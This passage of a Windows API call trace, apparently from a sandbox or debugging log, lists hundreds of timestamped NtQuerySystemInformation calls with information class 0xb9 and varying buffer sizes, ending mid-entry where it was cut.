NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x48, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x48, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, 